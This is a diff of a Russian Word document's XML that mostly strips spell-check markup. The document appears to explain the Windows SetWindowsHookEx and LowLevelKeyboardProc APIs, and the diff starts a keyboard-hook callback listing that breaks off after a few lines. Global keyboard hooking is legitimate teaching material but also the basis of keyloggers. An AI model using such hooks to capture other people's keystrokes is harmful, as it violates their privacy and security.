-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>hMod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DWORD</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3093,7 +2693,6 @@
         </w:rPr>
         <w:t>dwThreadId</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3113,39 +2712,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>станавливает определяемую программой процедуру фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) в цепочку фильтров (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>станавливает определяемую программой процедуру фильтра (hook) в цепочку фильтров (hook).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3158,60 +2725,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>idHook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>] Определяет тип устанавливаемой процедуры фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). </w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">idHook </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[in] Определяет тип устанавливаемой процедуры фильтра (hook). </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3266,140 +2792,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Lpfn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>] Указатель на процедуру фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Если параметр </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dwThreadId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lpfn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> должен указывать на процедуру фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) в динамически подключаемой библиотеке (DLL). В противном случае, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lpfn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> может указывать на процедуру фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) в коде, связанном с текущим процессом.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Lpfn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Указатель на процедуру фильтра (hook). Если параметр dwThreadId равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр lpfn должен указывать на процедуру фильтра (hook) в динамически подключаемой библиотеке (DLL). В противном случае, lpfn может указывать на процедуру фильтра (hook) в коде, связанном с текущим процессом.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3412,140 +2817,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hMod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>] Дескриптор DLL, содержащий процедуры фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">), на которую указывает параметр </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lpfn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.  параметр </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hMod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> должен быть установлен в ПУСТО (NULL), </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>если  параметр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dwThreadId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> устанавливает поток, созданный текущим процессом, и если процедура фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) находится внутри кода, связанного с текущим процессом.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hMod </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Дескриптор DLL, содержащий процедуры фильтра (hook), на которую указывает параметр lpfn.  параметр hMod должен быть установлен в ПУСТО (NULL), если  параметр dwThreadId устанавливает поток, созданный текущим процессом, и если процедура фильтра (hook) находится внутри кода, связанного с текущим процессом.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3558,92 +2842,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dwThreadId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">] Устанавливает </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>идентификатор потока</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> с которым, процедура фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>hook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dwThreadId </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Устанавливает идентификатор потока с которым, процедура фильтра (hook) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (hook) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3709,8 +2920,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3719,7 +2928,6 @@
         </w:rPr>
         <w:t>LowLevelKeyboardProc</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3727,8 +2935,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3737,7 +2943,6 @@
         </w:rPr>
         <w:t>int</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3745,7 +2950,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3754,7 +2958,6 @@
         </w:rPr>
         <w:t>nCode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3777,7 +2980,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3786,7 +2988,6 @@
         </w:rPr>
         <w:t>wParam</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3809,7 +3010,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3818,7 +3018,6 @@
         </w:rPr>
         <w:t>lParam</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3838,23 +3037,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">истема вызывает эту функцию каждый раз, когда собирается вставить новое событие ввода с клавиатуры в очередь ввода данных потока. Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>keybd_event</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>истема вызывает эту функцию каждый раз, когда собирается вставить новое событие ввода с клавиатуры в очередь ввода данных потока. Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3870,44 +3053,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>] Устанавливает идентификатор сообщения клавиатуры.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">wParam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Устанавливает идентификатор сообщения клавиатуры.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3923,44 +3081,19 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lParam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>[in] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3984,7 +3117,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Листинг функции </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -3993,7 +3125,6 @@
         </w:rPr>
         <w:t>LowLevelKeyboardProc</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4017,109 +3148,7 @@
           <w:szCs w:val="12"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">LRESULT CALLBACK </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LowLevelKeyboardHook</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>int</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, WPARAM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>wParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, LPARAM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4170,37 +3199,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GetKeyState</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NULL);</w:t>
+        <w:t>GetKeyState(NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4226,86 +3225,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
